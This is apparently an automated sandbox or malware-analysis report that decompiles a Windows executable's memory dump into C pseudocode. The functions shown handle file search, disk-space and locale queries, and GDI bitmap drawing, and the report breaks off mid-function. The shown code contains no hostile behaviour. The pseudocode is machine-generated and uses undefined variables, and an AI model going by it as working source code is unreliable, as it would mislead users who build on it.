                                                                        0x004089da
                                                                        0x004089e0
                                                                        0x004089fd
                                                                        0x004089e2
                                                                        0x004089e9
                                                                        0x004089ed
                                                                        0x004089f1
                                                                        0x004089f1
                                                                        0x004089ed
                                                                        0x00408a04

                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00465E52,00000000,00465FCC,?,00000000,00465FF4), ref: 004089D3
                                                                        • GetLastError.KERNEL32(00000000,?,?,?,?,00465E52,00000000,00465FCC,?,00000000,00465FF4), ref: 004089F8
                                                                          • Part of subcall function 00408954: FileTimeToLocalFileTime.KERNEL32(?), ref: 00408981
                                                                          • Part of subcall function 00408954: FileTimeToDosDateTime.KERNEL32 ref: 00408990
                                                                          • Part of subcall function 00408A2C: FindClose.KERNEL32(?,?,004089F6,00000000,?,?,?,?,00465E52,00000000,00465FCC,?,00000000,00465FF4), ref: 00408A38
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                        • String ID:
                                                                        • API String ID: 976985129-0
                                                                        • Opcode ID: 19c777b74b7e602315d21aafcbf4c490357a5b7749ace5ad930647ac6ae3a4a6
                                                                        • Instruction ID: 2fdbdee162175b761896c87037c5b9f9377ba6162d2e3e0bb2753c189c1fa674
                                                                        • Opcode Fuzzy Hash: 19c777b74b7e602315d21aafcbf4c490357a5b7749ace5ad930647ac6ae3a4a6
                                                                        • Instruction Fuzzy Hash: 3EE0A0B2B011200787547A6E088106A61C84A8436430A037FB8A4FB383CE38CC1253AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408B82, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00408B82(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004052D8(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004052D8(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                                                        0x00408b8b
                                                                        0x00408b90
                                                                        0x00408b92
                                                                        0x00408b92
                                                                        0x00408ba5
                                                                        0x00408bb4
                                                                        0x00408bb7
                                                                        0x00408bc4
                                                                        0x00408bc7
                                                                        0x00408bcc
                                                                        0x00408bcf
                                                                        0x00408bd1
                                                                        0x00408bde
                                                                        0x00408be1
                                                                        0x00408be6
                                                                        0x00408be9
                                                                        0x00408beb
                                                                        0x00408bf4

                                                                        APIs
                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408BA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1705453755-0
                                                                        • Opcode ID: 8c3c27e9755346353a045cf5bdeb0cfb662459817c7037a9d861ed42329773fe
                                                                        • Instruction ID: de1650325fe5397c084f4a6593de8e898784f8a230013e31698277919b13c4d8
                                                                        • Opcode Fuzzy Hash: 8c3c27e9755346353a045cf5bdeb0cfb662459817c7037a9d861ed42329773fe
                                                                        • Instruction Fuzzy Hash: 8911C0B5A00209AFDB44CFA9C9819FFB7F9EFC8304B14C569A505E7255E6319E018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042E904, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E0042E904(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00406D8C();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42e93e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E004037D8(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








                                                                        0x0042e90d
                                                                        0x0042e910
                                                                        0x0042e912
                                                                        0x0042e918
                                                                        0x0042e95c
                                                                        0x0042e960
                                                                        0x0042e961
                                                                        0x0042e965
                                                                        0x0042e968
                                                                        0x0042e969
                                                                        0x0042e96e
                                                                        0x00000000
                                                                        0x0042e96e
                                                                        0x0042e91d
                                                                        0x0042e922
                                                                        0x0042e925
                                                                        0x0042e92f
                                                                        0x0042e936
                                                                        0x0042e939
                                                                        0x00000000

                                                                        APIs
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042E969
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: 9c596d21078fed3a9d89efd8fc4f6a994b7920d476d9afe4056f6d1ffce15fa2
                                                                        • Instruction ID: f9eeb0bd4d7c25621653af731bc53ef1cfa14841bd536920d24b9f13dfd4916e
                                                                        • Opcode Fuzzy Hash: 9c596d21078fed3a9d89efd8fc4f6a994b7920d476d9afe4056f6d1ffce15fa2
                                                                        • Instruction Fuzzy Hash: 6BF096B6704214FFA740DF9BE881C56BBECEB4976035140B7F908D7641D235AD108B74
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421010, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00421010(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                                                                        0x00421016
                                                                        0x00421019
                                                                        0x0042101c
                                                                        0x00421020
                                                                        0x00421025
                                                                        0x0042102b
                                                                        0x0042102c
                                                                        0x00421036
                                                                        0x00421049
                                                                        0x00421052
                                                                        0x0042105a
                                                                        0x0042105d
                                                                        0x0042105d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421038
                                                                        0x00421038
                                                                        0x0042103b
                                                                        0x0042103d
                                                                        0x00421040
                                                                        0x00421043
                                                                        0x00421043
                                                                        0x00000000
                                                                        0x00421038
                                                                        0x00421064

                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,004242BB), ref: 00421020
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InfoSystem
                                                                        • String ID:
                                                                        • API String ID: 31276548-0
                                                                        • Opcode ID: 2c1bfe724d55eced2460a94d747cbc478171a50e3dc461202833e06be99d106e
                                                                        • Instruction ID: 04fc2440cd9ad2650c0e00fa06da3308fd472f0d9cf16e671786a1d9d478cb42
                                                                        • Opcode Fuzzy Hash: 2c1bfe724d55eced2460a94d747cbc478171a50e3dc461202833e06be99d106e
                                                                        • Instruction Fuzzy Hash: F1F0F671E011989FCB10DF98D4C489CF7B4FB6630178042ABD404E7752EB38AAD4C785
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004099D4, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004099D4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E0040439C(_t10, _t18);
				}
				return E00404438(_t10, _t5 - 1,  &_v260);
			}






                                                                        0x004099df
                                                                        0x004099e1
                                                                        0x004099f9
                                                                        0x00000000
                                                                        0x00409a11
                                                                        0x00000000

                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 6d4505707c63b76cac3e0676a6b6eb291f3a782b0f26e0b89a3948489b83773d
                                                                        • Instruction ID: 7137d42587ef6e9424c6f5683677316ed30462f518c18fcd4d474a69c543d147
                                                                        • Opcode Fuzzy Hash: 6d4505707c63b76cac3e0676a6b6eb291f3a782b0f26e0b89a3948489b83773d
                                                                        • Instruction Fuzzy Hash: 02E0927270021417D310A5995C82AF6B29C9798710F00027FBE05E73C2EDB49D8046E9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409A20, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00409A20(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                                                        0x00409a23
                                                                        0x00409a24
                                                                        0x00409a3a
                                                                        0x00409a41
                                                                        0x00409a3c
                                                                        0x00409a3c
                                                                        0x00409a3c
                                                                        0x00409a47

                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B062,00000000,0040B27B,?,?,00000000,00000000), ref: 00409A33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: a037e1ffc487cbdf8a1452153527e2d09f42d5569d242225ab472293c4c34240
                                                                        • Instruction ID: 4a1f5b95e23893c2f84cdfe52ccb7256b046ec808ce31a973917bc394286bd3d
                                                                        • Opcode Fuzzy Hash: a037e1ffc487cbdf8a1452153527e2d09f42d5569d242225ab472293c4c34240
                                                                        • Instruction Fuzzy Hash: 83D05E6630D2902AE220515A2D85EBB4ADCCAC57B0F10403AB948D6243D2348C0697B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040697A, Relevance: .0, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040697A() {

				goto ( *0x4972c4);
			}



                                                                        0x0040697c

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1fdcf8729b3717a21ad8a35810d41d58f3c43d8022705d453ee8d5b93d57eb57
                                                                        • Instruction ID: 4cc6231a8fdf11d821561513d84f42913eba31ac0e3af33e1c2ee8a8a9e96ad2
                                                                        • Opcode Fuzzy Hash: 1fdcf8729b3717a21ad8a35810d41d58f3c43d8022705d453ee8d5b93d57eb57
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004070D2, Relevance: .0, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004070D2() {

				goto ( *0x49754c);
			}



                                                                        0x004070d4

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 911670b8d5363b89cd4316b1b8d5532a397f614d330e9fd9583f979b1cdd48c7
                                                                        • Instruction ID: df99d3165f745737c670b055c3ca7d7d26e8fb5f39eb6d542cb73e4907201df1
                                                                        • Opcode Fuzzy Hash: 911670b8d5363b89cd4316b1b8d5532a397f614d330e9fd9583f979b1cdd48c7
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00420CCC, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 52%
                                                                        			E00420CCC(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x495c48; // 0x47a0ac
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00406AE4();
					_v20 = E00420B28(0);
					_push(_t177);
					_push(0x420f4c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00406ADC();
					_v24 = E00420B28(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x496a28; // 0xa3080776
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00406C5C();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00406C5C();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x496a28; // 0xa3080776
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00406C5C();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00406C5C();
						_v40 = _t135;
					}
					_push(_v20);
					L00406C2C();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E00420F53);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00406C5C();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00406ADC();
					_v24 = E00420B28(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x420d9f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407308(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E00420F53);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                                                        0x00420ccd
                                                                        0x00420ccf
                                                                        0x00420cd5
                                                                        0x00420cd8
                                                                        0x00420cdb
                                                                        0x00420cdd
                                                                        0x00420ce0
                                                                        0x00420ce3
                                                                        0x00420ce7
                                                                        0x00420cef
                                                                        0x00420da8
                                                                        0x00420dab
                                                                        0x00420dad
                                                                        0x00420db7
                                                                        0x00420dbc
                                                                        0x00420dbd
                                                                        0x00420dc2
                                                                        0x00420dc5
                                                                        0x00420dc8
                                                                        0x00420dc9
                                                                        0x00420dcd
                                                                        0x00420dce
                                                                        0x00420dd8
                                                                        0x00420de8
                                                                        0x00420deb
                                                                        0x00420ded
                                                                        0x00420df2
                                                                        0x00420df3
                                                                        0x00420df6
                                                                        0x00420df7
                                                                        0x00420dfc
                                                                        0x00420dff
                                                                        0x00420e04
                                                                        0x00420e08
                                                                        0x00420e09
                                                                        0x00420e12
                                                                        0x00420e28
                                                                        0x00420e2a
                                                                        0x00420e2f
                                                                        0x00420e30
                                                                        0x00420e33
                                                                        0x00420e34
                                                                        0x00420e39
                                                                        0x00420e14
                                                                        0x00420e14
                                                                        0x00420e19
                                                                        0x00420e1a
                                                                        0x00420e1d
                                                                        0x00420e1e
                                                                        0x00420e23
                                                                        0x00420e23
                                                                        0x00420e3f
                                                                        0x00420e40
                                                                        0x00420e62
                                                                        0x00420e84
                                                                        0x00420e91
                                                                        0x00420e9f
                                                                        0x00420ec6
                                                                        0x00420eeb
                                                                        0x00420ef5
                                                                        0x00420eff
                                                                        0x00420f08
                                                                        0x00420f12
                                                                        0x00420f12
                                                                        0x00420f1b
                                                                        0x00420f22
                                                                        0x00420f25
                                                                        0x00420f28
                                                                        0x00420f31
                                                                        0x00420f33
                                                                        0x00420f38
                                                                        0x00420f3c
                                                                        0x00420f3d
                                                                        0x00420f3d
                                                                        0x00420f4b
                                                                        0x00420d07
                                                                        0x00420d07
                                                                        0x00420d09
                                                                        0x00420d0e
                                                                        0x00420d0f
                                                                        0x00420d19
                                                                        0x00420d29
                                                                        0x00420d2e
                                                                        0x00420d2f
                                                                        0x00420d34
                                                                        0x00420d37
                                                                        0x00420d73
                                                                        0x00420d7a
                                                                        0x00420d7d
                                                                        0x00420d80
                                                                        0x00420d92
                                                                        0x00420d9e
                                                                        0x00420d9e

                                                                        APIs
                                                                        • 72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 00420D0F
                                                                        • SelectObject.GDI32(?,?), ref: 00420D24
                                                                        • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0042011F,?,?,?,00000000,00000000,00420D9F,?,?), ref: 00420D73
                                                                        • SelectObject.GDI32(?,?), ref: 00420D8D
                                                                        • DeleteObject.GDI32(?), ref: 00420D99
                                                                        • 72E7A590.GDI32(00000000,00000000,?,?), ref: 00420DAD
                                                                        • 72E7A520.GDI32(?,?,?,00000000,00420F4C,?,00000000,00000000,?,?), ref: 00420DCE
                                                                        • SelectObject.GDI32(?,?), ref: 00420DE3
                                                                        • 72E7B410.GDI32(?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C,?,00000000,00000000,?,?), ref: 00420DF7
                                                                        • 72E7B410.GDI32(?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C,?,00000000,00000000), ref: 00420E09
                                                                        • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C), ref: 00420E1E
                                                                        • 72E7B410.GDI32(?,A3080776,000000FF,?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C), ref: 00420E34
                                                                        • 72E7B150.GDI32(?,?,A3080776,000000FF,?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000), ref: 00420E40
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420E62
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0042011F,?,?,00440328), ref: 00420E84
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420E8C
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 00420E9A
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00420EC6
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420EEB
                                                                        • SetTextColor.GDI32(?,0042011F), ref: 00420EF5
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420EFF
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420F12
                                                                        • DeleteObject.GDI32(?), ref: 00420F1B
                                                                        • 72E7B410.GDI32(?,00000000,00000000,00420F53,?,0042011F,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00420F3D
                                                                        • DeleteDC.GDI32(?), ref: 00420F46
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                        • String ID:
                                                                        • API String ID: 3348367721-0
                                                                        • Opcode ID: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction ID: 5ed571c653ffefc6f61770c509f2f379e260f00009d4f5806ec2ee285bbd0929
                                                                        • Opcode Fuzzy Hash: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction Fuzzy Hash: D781C3B1A04218AFDB50EFA9CD81EAF77ECEB0D314F114419F618F7281C639AD508B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004240C0, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 51%
                                                                        			E004240C0(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E004235B4(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x4242bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00406EB4();
					_v12 = E00420B28(0);
					_push(_v12);
					L00406AE4();
					_v20 = E00420B28(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00406ACC();
					_v8 = _t64;
					if(_v8 == 0) {
						L18:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
